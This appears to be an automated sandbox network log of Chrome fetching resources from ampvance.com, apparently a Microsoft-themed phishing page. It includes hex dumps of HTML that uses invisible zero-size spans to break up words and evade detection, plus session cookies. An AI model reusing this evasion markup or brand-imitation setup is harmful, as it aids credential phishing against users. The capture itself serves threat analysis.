                                                      2024-03-05 13:25:04 UTC1369INData Raw: 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 64 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e
                                                      Data Ascii: -size: 0.02px;">R</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">R</span>d<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; fon
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78
                                                      Data Ascii: width: 0.01px; max-height: 0.03px; font-size: 0.02px;">R</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">R</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e
                                                      Data Ascii: ine; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">R</span> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">R</span>o<span style="display: in
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30
                                                      Data Ascii: px;">R</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">R</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.549757104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:03 UTC1167OUTGET /ASSETS/img/m_.svg HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC751INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 12:48:50 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: HIT
                                                      Age: 2174
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G70qOnazG9jLtyIHjcSq%2B%2BQc7pMcPrzJ5og1o892PnR3dQ2XsLAJ%2BG0ebhyVB8wiIjMw%2FM0%2ByaqFz6ExDr9CSnIH%2FWUVoKfBaM5VZ8lzFiOMQtcACaxtACGNLyQzaJA%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e0cbf705e72-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC618INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                      Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 2e 37 30 37 2c 30 2c 30 2c 31 2d 34 2e 39 31 38 2d 34 2e 39 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36
                                                      Data Ascii: .707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 2d 2e 37 34 31 2c 31 2e 30 32 39 2c 31 2e 30 32 39 2c 30 2c 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30
                                                      Data Ascii: -.741,1.029,1.029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0
                                                      2024-03-05 13:25:04 UTC302INData Raw: 34 31 2c 30 2c 30 2c 31 2d 2e 37 33 36 2d 32 2e 33 36 33 5a 22 20 66 69 6c 6c 3d 22 23 37 33 37 33 37 33 22 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 32 35 30 32 32 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31
                                                      Data Ascii: 41,0,0,1-.736-2.363Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="1
                                                      2024-03-05 13:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.549760104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:03 UTC1171OUTGET /ASSETS/img/sig-op.svg HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC749INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 12:48:50 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: HIT
                                                      Age: 2174
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wJpddaYMAWDjjZmXoiUG%2BR2xa3iRq4AoBUVPSdWyQQ7vIJm7%2BgzEQWPmIVXyAVz7wlMnPgkFkr99e7luiTyzc9Yqa9cr4ZJWYDi%2FoUQS2zo37fj%2BQ0heslRST%2Fjkjjc%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e0cbd4f4339-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC620INData Raw: 36 33 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39
                                                      Data Ascii: 638<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689
                                                      2024-03-05 13:25:04 UTC979INData Raw: 33 37 33 2c 30 2c 30 2c 31 2c 32 38 2e 35 2c 31 33 2e 34 35 33 61 31 30 2e 34 2c 31 30 2e 34 2c 30 2c 30 2c 31 2c 31 2e 31 30 39 2c 32 2e 36 32 35 41 31 31 2e 36 31 36 2c 31 31 2e 36 31 36 2c 30 2c 30 2c 31 2c 33 30 2c 31 39 61 31 30 2e 30 31 35 2c 31 30 2e 30 31 35 2c 30 2c 30 2c 31 2d 2e 31 32 35 2c 31 2e 35 37 38 2c 31 30 2e 38 37 39 2c 31 30 2e 38 37 39 2c 30 2c 30 2c 31 2d 2e 33 35 39 2c 31 2e 35 33 31 5a 6d 2d 32 2c 2e 38 34 34 4c 32 37 2e 32 31 39 2c 32 32 2e 36 34 31 61 31 34 2e 37 31 36 2c 31 34 2e 37 31 36 2c 30 2c 30 2c 30 2c 2e 35 36 32 2d 31 2e 37 38 32 41 37 2e 37 35 31 2c 37 2e 37 35 31 2c 30 2c 30 2c 30 2c 32 38 2c 31 39 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 2e 37 2d 33 2e 35 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d
                                                      Data Ascii: 373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-
                                                      2024-03-05 13:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.549758104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:03 UTC1197OUTGET /x/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee7 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC744INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:25:04 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t2XtQZ7IrgLo%2B6%2FQ%2FlfV7NC4C7HNPD2jOpTEhnnufHBTudhN0Hsvy4fb8ExsQEQqOX0DCIHvg%2FXAPrQZ2RIqkIOId2e57I4UHShefTBnpBhck9eP%2F49f3%2FOfobYkaLY%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e0ccc3c7c84-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC625INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                      Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                      2024-03-05 13:25:04 UTC1246INData Raw: 2e 38 2d 34 35 35 2e 35 39 35 20 31 32 34 39 2e 38 2d 31 30 31 37 2e 36 53 39 35 36 2e 30 34 36 2d 38 31 39 2e 36 20 32 36 35 2e 38 2d 38 31 39 2e 36 2d 39 38 34 2d 33 36 34 2e 30 30 35 2d 39 38 34 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20
                                                      Data Ascii: .8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90)
                                                      2024-03-05 13:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.549764104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:04 UTC569OUTGET /ASSETS/img/m_.svg HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC745INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:23:45 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: HIT
                                                      Age: 79
